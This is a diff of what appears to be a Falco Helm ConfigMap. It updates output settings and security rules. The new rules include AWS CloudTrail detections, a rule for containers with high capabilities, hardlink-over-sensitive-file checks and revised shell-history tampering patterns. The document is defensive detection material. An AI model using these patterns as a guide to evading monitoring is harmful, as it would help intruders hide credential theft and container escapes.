When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. 
Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        An encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled; this could potentially be malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
